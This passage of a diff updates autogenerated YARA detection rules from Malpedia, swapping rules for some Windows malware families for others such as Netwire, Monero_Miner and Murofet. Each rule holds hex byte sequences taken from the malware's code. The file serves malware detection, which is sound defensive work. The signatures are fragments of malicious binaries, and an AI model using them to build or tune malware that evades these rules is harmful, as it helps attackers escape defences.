+		$sequence_1 = { 0f8407000000 0f8501000000 f8 8b550c }
+		$sequence_2 = { b941000000 33c0 8dbda9faffff f3ab }
+		$sequence_3 = { 7546 80bd47faffff00 7431 8b8548faffff 8a4801 888d46faffff }
+		$sequence_4 = { 0355f4 0fbe4201 3345f4 8945fc 0f8407000000 }
+		$sequence_5 = { 6a00 8d85a8faffff 50 8d8dbcfcffff }
+		$sequence_6 = { 85c9 740d 85c0 7409 5f 5e }
+		$sequence_7 = { 6a00 68???????? 8d85f8fbffff 50 e8???????? 83c408 50 }
+		$sequence_8 = { 0f8501000000 f8 68???????? 8d8dfcfbffff 51 e8???????? 83c408 }
+		$sequence_9 = { ffd3 8bf0 85f6 0f8487000000 8b3d???????? }
 
 	condition:
-		7 of them and filesize < 1875968
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Newpass_Auto : FILE
+rule MALPEDIA_Win_Warhawk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d6b059ee-c4d5-5cd3-bec7-199d16e8018e"
+		id = "7fcbe369-7eba-5509-9f6c-bc41b0560179"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newpass"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.newpass_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warhawk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.warhawk_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "68e2df4904722bca2b5d5336a84032d81343ac67dcb544535e3fd89fb775b501"
+		logic_hash = "44d5f6f70697925bfa262390ea7caffa63c489e29c99852e5d174229a319929a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144122,32 +143963,32 @@ rule MALPEDIA_Win_Newpass_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c89642438 4c89742428 48ffc0 418bf0 4c8bf2 }
-		$sequence_1 = { 4c8bc3 4c8d4820 4889442420 e8???????? 488b442440 4883c028 4883c430 }
-		$sequence_2 = { cc 4885d2 7509 33c9 ff15???????? cc 4533c9 }
-		$sequence_3 = { 488b4c2430 4885c9 7417 488b11 ff5210 4885c0 740c }
-		$sequence_4 = { 66895d00 6685c0 7505 4c8bc3 eb0f 4c8bc7 90 }
-		$sequence_5 = { e8???????? 488bf8 eb03 488bfe 488d55d8 e8???????? 488bd8 }
-		$sequence_6 = { b850800000 e8???????? 482be0 48c7442428feffffff 48899c2470800000 4889b42478800000 488b05???????? }
-		$sequence_7 = { 84c0 0f84c6000000 488b03 48634804 4803cb 488d9424c8000000 e8???????? }
-		$sequence_8 = { 4d8d0c18 482bf9 48c1ff05 488bcf 48d1e9 498bc2 482bc1 }
-		$sequence_9 = { 57 4154 4155 4156 4157 488dac24d8deffff b828220000 }
+		$sequence_0 = { e8???????? 8be5 5d c3 bb02000000 8b4dfc 8bc3 }
+		$sequence_1 = { 83f809 0f8799000000 ff248521b34000 ff7510 ff750c e8???????? }
+		$sequence_2 = { 0f8482000000 53 57 6a28 ff15???????? 8bd8 83c404 }
+		$sequence_3 = { 0f8473010000 8d85fcfbffff 8d5001 660f1f440000 8a08 40 84c9 }
+		$sequence_4 = { 0fb606 50 e8???????? 0fb60b }
+		$sequence_5 = { e711 a0???????? ad fb 93 9f b66c }
+		$sequence_6 = { 85c9 7406 8b4204 894104 8b4e08 3bd1 }
+		$sequence_7 = { 8b7d0c 33db 897df4 8975f8 8945fc 8a06 3a8358e94100 }
+		$sequence_8 = { 0fb680201c4000 ff2485001c4000 c6065c eb30 c60622 eb2b c60662 }
+		$sequence_9 = { 660f2fda 0f93c0 85c0 754d }
 
 	condition:
-		7 of them and filesize < 2654208
+		7 of them and filesize < 2345984
 }
-rule MALPEDIA_Win_Coinminer_Auto : FILE
+rule MALPEDIA_Win_Greetingghoul_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dd71a564-9751-5c18-a6bf-b9b0587239f2"
+		id = "ab352bb6-0e90-5ea4-81b4-0f0ddff67e2f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.coinminer_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.greetingghoul"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.greetingghoul_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "c6e378240c8214f1ad0ec61fc8d57006e837b16f1716923b20f2ac30be5b248c"
+		logic_hash = "05f8eb95e67f4d995ab80e8300d436e31d93b18d0182fa8edc0fa057e1e63b5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144161,32 +144002,32 @@ rule MALPEDIA_Win_Coinminer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8d24e5ffff 8b0485a05f9a00 f644010440 7409 803a1a 7504 33c0 }
-		$sequence_1 = { 8b85f0feffff 85c0 7509 33d2 }
-		$sequence_2 = { 83c801 85c0 741d 8d85d4fdffff }
-		$sequence_3 = { ebcc 5f 5e 33c0 5b 8be5 }
-		$sequence_4 = { c7465c60fd8f00 83660800 33ff 47 897e14 }
-		$sequence_5 = { ff15???????? 6683bc24b002000000 8d8c24b0020000 ba???????? }
-		$sequence_6 = { 7e58 bc80304a3e 60 4c 1c00 59 6443 }
-		$sequence_7 = { 57 6868060000 0f57c0 894c2440 8d8424ec000000 c744242400004000 }
-		$sequence_8 = { c3 8b04c50c509000 5d c3 55 8bec 8b4508 }
-		$sequence_9 = { 8304240d cb 8d85b0fdffff 8945fc 85c0 745d 8b4df0 }
+		$sequence_0 = { 8945f4 33c9 894df8 380f 7409 }
+		$sequence_1 = { 57 660fd603 33ff c6430800 c70600000000 }
+		$sequence_2 = { ff15???????? 85c0 7e06 03f0 2bf8 75ea }
+		$sequence_3 = { 750c 6a21 e8???????? 83c404 eb0d 8d4721 }
+		$sequence_4 = { c3 0fbec8 0fbec3 8b5dfc 2bc8 74e1 }
+		$sequence_5 = { 75eb 8b5dfc 83c8ff 3b5df8 5f 0f44d8 5e }
+		$sequence_6 = { 7e06 03d8 2bf0 75ea }
+		$sequence_7 = { 33f6 8a17 80fa20 740a }
+		$sequence_8 = { e8???????? 83c404 eb10 8d4701 03c3 50 }
+		$sequence_9 = { 5d c3 5f c7462800000000 8bc3 5e 5b }
 
 	condition:
-		7 of them and filesize < 1523712
+		7 of them and filesize < 696320
 }
-rule MALPEDIA_Win_Common_Magic_Auto : FILE
+rule MALPEDIA_Win_Monero_Miner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "af63221a-d89f-5b5e-b536-f2130b5cebfc"
+		id = "53964e17-4946-5df0-a485-9eaee6f615c2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.common_magic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.common_magic_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.monero_miner_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "20951a1a53280d6d98a10f242cdfcf681eb6a68d19880713aace683e29423308"
+		logic_hash = "cffe54ca1957e07a44d930d7017ae2111987cffb75cbed1acab293924f2ab98e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144200,32 +144041,32 @@ rule MALPEDIA_Win_Common_Magic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 59 5d c20400 e8???????? 85c0 0f84c02e0000 }
-		$sequence_1 = { 885c012e 8b049570804100 804c012d04 46 }
-		$sequence_2 = { 8d8de8fdffff c685a4fdffff00 51 ffb5a4fdffff 8d8dacfdffff }
-		$sequence_3 = { 68???????? 51 50 51 ffb580feffff 8d8d5cffffff e8???????? }
-		$sequence_4 = { 83c404 c645fc03 8b8d70ffffff 83f908 }
-		$sequence_5 = { 0f1f4000 0f1f840000000000 a1???????? c7855cffffff00000000 }
-		$sequence_6 = { ff7610 50 8d45c8 50 ffd7 }
-		$sequence_7 = { 75e8 8b7dd4 8b55c4 8d4dd4 8b45e8 8bf2 }
-		$sequence_8 = { 85c0 0f84c02e0000 c3 833d????????ff 7503 33c0 c3 }
-		$sequence_9 = { 90 668b0431 663b01 750a 83c102 83ea01 75ef }
+		$sequence_0 = { c6043000 c744240811000000 89442404 c70424???????? e8???????? 85c0 7411 }
+		$sequence_1 = { e8???????? 0fb643fa 8d4e04 c7442404???????? 890c24 89442408 e8???????? }
+		$sequence_2 = { 8b6c240c 136c2424 8b8c24d4000000 8bbc24dc000000 89c2 8b4350 31f2 }
+		$sequence_3 = { e8???????? 8d9424a0000000 8d442460 b901000000 e8???????? 8d542460 8d8424a0000000 }
+		$sequence_4 = { 890424 e8???????? 83f8ff 0f8463050000 817c2434ff3f0000 8b442430 0f96c2 }
+		$sequence_5 = { 8b94247c010000 898c2448020000 899c244c020000 8b9c248c010000 89c5 0fa4d017 0fa4ea17 }
+		$sequence_6 = { 8db4248c000000 c60000 89442414 8b8398000000 8974240c c7442404???????? 89442410 }
+		$sequence_7 = { 8b542428 8354242c00 83c340 836c242040 c1e206 39542414 0f87c3feffff }
+		$sequence_8 = { ffd6 83f8ff 75de 81c4cc0f0000 89e8 5b 5e }
+		$sequence_9 = { 8906 8b7413fc 897411fc 8b7d14 89de 81c784000000 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 1425408
 }
-rule MALPEDIA_Win_Bandook_Auto : FILE
+rule MALPEDIA_Win_Rincux_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "49488c81-393e-59b5-ae7a-2a41b9e495a2"
+		id = "fcec6357-ec7f-5319-84f9-3e3af9251503"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bandook_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rincux_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "aa9d013de87f3f2f49289f0a80f6ab44faf8f44b73388fb66ee1528c334b1487"
+		logic_hash = "495e2f221b3a3eaf8635ea3eb223efd9431aa4fc4e38116d5df5e0ad084dcaef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144239,32 +144080,32 @@ rule MALPEDIA_Win_Bandook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b85f0bfffff 8985a0beffff 89b598beffff 899d94beffff }
-		$sequence_1 = { 8d95f4fbffff 83c414 e8???????? 8b4df8 33cd 5e e8???????? }
-		$sequence_2 = { 8b45f0 0fb640f8 0fb680789d1c13 3334c5a3c31e13 8bc2 c1e818 0fb688789d1c13 }
-		$sequence_3 = { 83c404 89442414 68c0d40100 e8???????? 83c404 8bf8 }
-		$sequence_4 = { 8945fc 803d????????01 8b4508 753a ff30 ba???????? }
-		$sequence_5 = { 8bc8 e8???????? 83c408 8d4704 c707???????? c700???????? 8b4df4 }
-		$sequence_6 = { 58 6bc000 c7805cd11e1302000000 6a04 58 6bc000 8b0d???????? }
-		$sequence_7 = { 64a300000000 8bf9 897dac c745fc00000000 897d98 c745a800000000 0f2805???????? }
-		$sequence_8 = { e8???????? 8bf0 83c404 8975e0 6a00 8bce c645fc01 }
-		$sequence_9 = { 0fb708 8d4002 66894c02fe 6685c9 75f0 8d8c24c00d0000 }
+		$sequence_0 = { 50 ff15???????? 89442418 8b442410 50 ff15???????? }
+		$sequence_1 = { 83cafe 42 7534 8a4c2414 8a542410 c644245c01 }
+		$sequence_2 = { 8b8c2494a00000 5f 5e 5d 33c0 5b }
+		$sequence_3 = { 53 55 56 57 0f84ec150000 8b581c 85db }
+		$sequence_4 = { bb06000000 8b04a8 8d7804 8b07 50 ff15???????? 83c704 }
+		$sequence_5 = { 50 68???????? 51 ffd6 8b15???????? 83c40c 8b049508a50210 }
+		$sequence_6 = { 85c0 7477 ff15???????? 83f812 746c 8b6c2418 8b35???????? }
+		$sequence_7 = { 8d4c2424 8d5d1c 52 8d7d10 8d7518 51 53 }
+		$sequence_8 = { 33db 33ed 3bf0 57 89742410 89442414 }
+		$sequence_9 = { 5b 5e 5d c20400 5e b8???????? }
 
 	condition:
-		7 of them and filesize < 23088128
+		7 of them and filesize < 392192
 }
-rule MALPEDIA_Win_Nullmixer_Auto : FILE
+rule MALPEDIA_Win_Murofet_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "07ba7e58-2a57-502b-80f6-37285125f4cb"
+		id = "ff4651b8-f01c-5a4b-b3ae-29bd62dfdd08"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nullmixer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.murofet_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "ef3e886b25db0cbcc96c6b82a5addac8533ba94ae036aa8c2ef621bf053010dc"
+		logic_hash = "94ade8c85b5c2b31256b3a8187c71d11e0c07536823190c2ab9a762d80de406f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144278,32 +144119,32 @@ rule MALPEDIA_Win_Nullmixer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85f6 0f8ed1000000 894c2418 8b7b68 c1e603 31d2 895c241c }
-		$sequence_1 = { e9???????? 8b4500 89e9 ff5028 8b442418 8b7c2454 8b5804 }
-		$sequence_2 = { 89ce 0f8586010000 38d0 0f84b9010000 0fb7442464 8b4c2460 6683f8ff }
-		$sequence_3 = { 8b45bc 85c0 0f8536020000 807dc001 0f842c020000 8b4520 31c9 }
-		$sequence_4 = { 83ec08 0fb6442420 8b7c2428 c7042400000000 8b542430 88442407 8b442424 }
-		$sequence_5 = { e8???????? 8b44243c b925000000 8b10 8b5218 81fa???????? 0f842bffffff }
-		$sequence_6 = { ff5210 0fbe17 89e9 89c3 8b4500 83ec04 891424 }
-		$sequence_7 = { e8???????? b902000000 89c6 89c3 f3a6 0f97c0 1c00 }
-		$sequence_8 = { 0f85baf9ffff 0fb7550c 8d4508 e8???????? 89c3 0fb64610 e9???????? }
-		$sequence_9 = { 8b842488000000 8b942494000000 8b00 894c2404 8954240c 8b8c2480000000 8b942490000000 }
+		$sequence_0 = { a2???????? 84c0 7510 e8???????? 3c04 73ce b002 }
+		$sequence_1 = { 72e5 e8???????? a2???????? 84c0 7510 }
+		$sequence_2 = { 3c02 72e5 e8???????? a2???????? 84c0 7510 }
+		$sequence_3 = { 3c04 73ce b002 a2???????? }
+		$sequence_4 = { 57 56 ff15???????? c6443eff00 83f8ff 7509 56 }
+		$sequence_5 = { e8???????? 32c0 eb43 be30750000 56 }
+		$sequence_6 = { e8???????? a2???????? 84c0 7510 e8???????? }
+		$sequence_7 = { e8???????? 3c04 73ce b002 }
+		$sequence_8 = { 84c0 7510 e8???????? 3c04 }
+		$sequence_9 = { 3c02 72e5 e8???????? a2???????? }
 
 	condition:
-		7 of them and filesize < 2351104
+		7 of them and filesize < 622592
 }
-rule MALPEDIA_Win_Unidentified_105_Auto : FILE
+rule MALPEDIA_Win_Waterspout_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3a3e23fc-74b8-538e-83ea-6f636ca69973"
+		id = "b586bd54-931a-56de-aa91-0c07bfde94ab"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_105"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_105_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.waterspout_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "f4fc15196e62980ff75ec5048526dde4db7767af139fed75b0b1419b85a6dee5"
+		logic_hash = "d8e2787076e89338cd714382e58eddd7d135aa9f7451f2a43ebcaaaa612febc9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144317,32 +144158,32 @@ rule MALPEDIA_Win_Unidentified_105_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 6800100000 8bf0 57 56 }
-		$sequence_1 = { 6a00 8d8dd0feffff 51 8d95fcfeffff }
-		$sequence_2 = { e8???????? 8bd8 83c404 53 8bce }
-		$sequence_3 = { e8???????? 6800002000 8bf8 6a00 57 897df4 }
-		$sequence_4 = { 8a08 40 84c9 75f9 2bc2 6a02 8d4c30fe }
-		$sequence_5 = { 85c0 750d 68???????? e8???????? 83c404 8b8df0efffff }
-		$sequence_6 = { 8b742414 83c404 b9???????? 8bc6 8d642400 }
-		$sequence_7 = { 8b3d???????? 8d45e4 50 33f6 }
-		$sequence_8 = { eb13 83f801 750e a1???????? }
-		$sequence_9 = { 8b85f4efffff 83c40c 6a00 8d8decefffff 51 6800100000 }
+		$sequence_0 = { 68???????? 56 e8???????? 83c418 84c0 751e 6a01 }
+		$sequence_1 = { 56 8d4c2420 8802 ff15???????? bf???????? 83c9ff }
+		$sequence_2 = { 88442424 32c3 50 e8???????? 8a4c2420 8ad3 32d1 }
+		$sequence_3 = { 83fe01 f3aa 8a842470200000 884500 }
+		$sequence_4 = { 57 57 50 ff15???????? 85c0 7540 8b0e }
+		$sequence_5 = { 83c408 8d4c2414 c744241430750000 6a04 51 }
+		$sequence_6 = { c68424870000008f c684248800000092 c68424890000009d c684248a00000038 c684248b000000f5 c684248c000000bc c684248d000000b6 }
+		$sequence_7 = { 8bb4240c200000 8d442410 6a00 50 6a00 6a00 6a00 }
+		$sequence_8 = { 8dbc24ac030000 f3ab 8d442410 8d4c2418 50 8b842490630000 51 }
+		$sequence_9 = { 33ff 3bdf 897d00 7403 53 ffd6 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Lilith_Auto : FILE
+rule MALPEDIA_Win_Gup_Proxy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b5f168af-a3f0-50f9-b1ea-d5b831d2999b"
+		id = "bddfea2f-5980-50a2-824f-c8c992e61d4b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lilith_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gup_proxy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gup_proxy_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "24d3c4eccb2438b08f77ee93becbd460d6cfbdd1ec4e6b4842ec58df50e21530"
+		logic_hash = "a31779681620c829a24a1dd7ede13a209b88a3ec71308cbcd7be1ef7e190536a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144356,32 +144197,32 @@ rule MALPEDIA_Win_Lilith_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81784800374300 7409 ff7048 e8???????? 59 c70701000000 8bcf }
-		$sequence_1 = { 8b7d08 8bd9 33f6 0f1f00 6a00 }
-		$sequence_2 = { e8???????? 8d4dd4 e8???????? 83c418 b9???????? 50 e8???????? }
-		$sequence_3 = { 57 56 ff15???????? ff75a0 8b35???????? ffd6 ff75a4 }
-		$sequence_4 = { 33c0 663b8880974200 740d 83c002 }
-		$sequence_5 = { 8d3c85d04a4300 8b0f 85c9 740b 8d4101 f7d8 1bc0 }
-		$sequence_6 = { 8d4dd4 50 e8???????? 8d4db4 e8???????? }
-		$sequence_7 = { c7411400000000 6a00 c741140f000000 c7411000000000 68???????? 8801 }
-		$sequence_8 = { c745fc00000000 0f57c0 6a00 50 }
-		$sequence_9 = { e8???????? 8b0d???????? e8???????? eb10 ff75dc 8b35???????? ffd6 }
+		$sequence_0 = { 660f6f05???????? f30f7f854cfaffff 660f6f05???????? f30f7f855cfaffff 660f6f05???????? }
+		$sequence_1 = { 8bc1 8b4df8 5e 33cd 5b e8???????? 8be5 }
+		$sequence_2 = { 8b4dfc f7d2 5f 5e 33cd 8bc2 5b }
+		$sequence_3 = { 8b5d08 8d85e0f5ffff 56 57 8bf1 8995dcf5ffff }
+		$sequence_4 = { eb83 890cb510974100 013d???????? 8b04b510974100 0500080000 3bc8 }
+		$sequence_5 = { 8bce e8???????? 6a04 8d8588feffff c78588feffffc22eab48 50 }
+		$sequence_6 = { c7461000000000 7204 8b06 eb02 8bc6 c60000 837e1410 }
+		$sequence_7 = { f30f7f45e8 6a50 8bf9 668945e8 }
+		$sequence_8 = { 88858afeffff 8bc3 c1e808 888589feffff 8d8588feffff }
+		$sequence_9 = { f30f7f853cffffff 660f6f05???????? f30f7f854cffffff 660f6f05???????? }
 
 	condition:
-		7 of them and filesize < 499712
+		7 of them and filesize < 247808
 }
-rule MALPEDIA_Win_Stegoloader_Auto : FILE
+rule MALPEDIA_Win_Netwire_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b6a7b2b-6883-5a49-84ad-5eb99ca2dffd"
+		id = "4555ab85-e4c7-54f3-be4b-3e67ab290352"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stegoloader_auto.yar#L1-L176"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.netwire_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "0fc5c31b9f64d477e89b80a8b4c8cba676e173d514623e0201d322a0680fd5e3"
+		logic_hash = "10b18e0d62127105687ce75fd82795cf02980d2ae8e7158e6a2316037cb7d8e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144395,38 +144236,32 @@ rule MALPEDIA_Win_Stegoloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 759d 8b043e 0345fc eb03 }
-		$sequence_1 = { 51 51 8b4514 8b4d18 53 56 57 }
-		$sequence_2 = { 8d4b01 40 57 894c2414 89442410 8d4c2410 }
-		$sequence_3 = { 881e 8811 0fb68801010000 0fb69000010000 8a0c01 020c02 8b55fc }
-		$sequence_4 = { 897dfc 8bf7 3bf7 743a 8bce }
-		$sequence_5 = { 50 8d45f0 50 53 53 ff75f8 e8???????? }
-		$sequence_6 = { 8945f0 894dfc 394dfc 753c 394e18 }
-		$sequence_7 = { 8bd3 e8???????? 03f3 59 8945f4 85c0 }
-		$sequence_8 = { 2b4c2408 8b542414 8a09 ff442414 48 880a }
-		$sequence_9 = { 895e04 895e08 895e0c 7611 53 }
-		$sequence_10 = { ff7108 e8???????? c3 56 8bf1 e8???????? f644240801 }
-		$sequence_11 = { 49 49 51 ff7004 8b4f04 }
-		$sequence_12 = { ff442414 48 880a 75e9 eb5b 83e803 eb02 }
-		$sequence_13 = { 8bf8 33f6 8b1c3e 6a40 83c604 8b043e }
-		$sequence_14 = { 83ceff 394c240c 7629 57 8b44240c 0fb61401 6a08 }
-		$sequence_15 = { c645ff00 8bc8 8bc7 f7f1 }
+		$sequence_0 = { c744241000000000 c744240c00000000 c744240800000000 c744240400000000 c7042410000000 }
+		$sequence_1 = { c744242c00000000 c744242800000000 c744242400000000 c7442420fdffffff }
+		$sequence_2 = { e8???????? c7042410000000 e8???????? 84c0 }
+		$sequence_3 = { e8???????? c7042446000000 e8???????? c7042449000000 e8???????? c7042446000000 e8???????? }
+		$sequence_4 = { c70424???????? e8???????? a3???????? e9???????? c705????????00000000 e9???????? c7042410020000 }
+		$sequence_5 = { e8???????? c7442410000000f0 c744240c01000000 c744240800000000 c744240400000000 c70424???????? }
+		$sequence_6 = { 83ec0c c7442408???????? c7442404???????? c70424???????? }
+		$sequence_7 = { 740c c7042400000000 e8???????? c70424???????? e8???????? }
+		$sequence_8 = { c70424???????? e8???????? a3???????? e9???????? c705????????00000000 e9???????? }
+		$sequence_9 = { e8???????? c7042401000000 e8???????? 84c0 }
 
 	condition:
-		7 of them and filesize < 802816
+		7 of them and filesize < 416768
 }
-rule MALPEDIA_Win_Milum_Auto : FILE
+rule MALPEDIA_Win_Fengine_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "072a5425-70d6-5cbe-aab8-850ca665ab19"
+		id = "cef733ce-bf96-5266-a850-204ef84184a0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.milum_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fengine"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fengine_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "9236edc24d0ffb81128dcba2f9b72495a7a041ad4784e9ea16fcd910b2720b0b"
+		logic_hash = "507e9d8622f7849f14197935caec762eb3952f2b4dfc87cf038f7351547ec88d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144440,32 +144275,32 @@ rule MALPEDIA_Win_Milum_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f85c1000000 8b7608 385e44 751c c6424401 c6464401 8b5104 }
-		$sequence_1 = { 53 8d9424bc000000 c741140f000000 895910 52 8819 e8???????? }
-		$sequence_2 = { 89a570feffff 6aff 53 8d5508 897114 895910 52 }
-		$sequence_3 = { 8b4214 2b4644 8b5218 8945e4 03c1 3bc2 7605 }
-		$sequence_4 = { 8b5604 52 c645fc06 e8???????? bf10000000 eb1b bf10000000 }
-		$sequence_5 = { 895e18 885e08 8b4df4 64890d00000000 59 5e 5b }
-		$sequence_6 = { 50 ba???????? e8???????? 8b850cfcffff a804 7414 8d4dc8 }
-		$sequence_7 = { 7e16 8b4d08 8b55d8 c741180d000000 89511c 83791800 7509 }
-		$sequence_8 = { c645fc17 50 8d4dc8 e8???????? c645fc03 8d8d04ffffff e8???????? }
-		$sequence_9 = { c745e000000000 c645d000 397e14 7314 8b4610 40 50 }
+		$sequence_0 = { ff15???????? 85c0 0f84c5020000 68???????? 53 e8???????? }
+		$sequence_1 = { 57 ff32 ff15???????? f7d8 1bc0 5e }
+		$sequence_2 = { 57 8d8decefffff 51 50 8d85fcf7ffff 50 }
+		$sequence_3 = { 50 e8???????? 8d5590 83c40c 8d4a01 8d642400 }
+		$sequence_4 = { c705????????01000000 e8???????? 48 f7d8 }
+		$sequence_5 = { 833d????????00 53 57 8bda 8bf9 7511 }
+		$sequence_6 = { 8b3e 83c328 0fb74706 8955e0 894ddc 3945f8 0f8c5affffff }
+		$sequence_7 = { 8d85f0efffff 50 53 ff15???????? 85c0 }
+		$sequence_8 = { 7410 8b4c3012 03c8 8d4616 }
+		$sequence_9 = { 3b45e4 7740 8d45ec 50 8b45e8 51 }
 
 	condition:
-		7 of them and filesize < 1076224
+		7 of them and filesize < 210944
 }
-rule MALPEDIA_Win_New_Ct_Auto : FILE
+rule MALPEDIA_Win_Bert_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
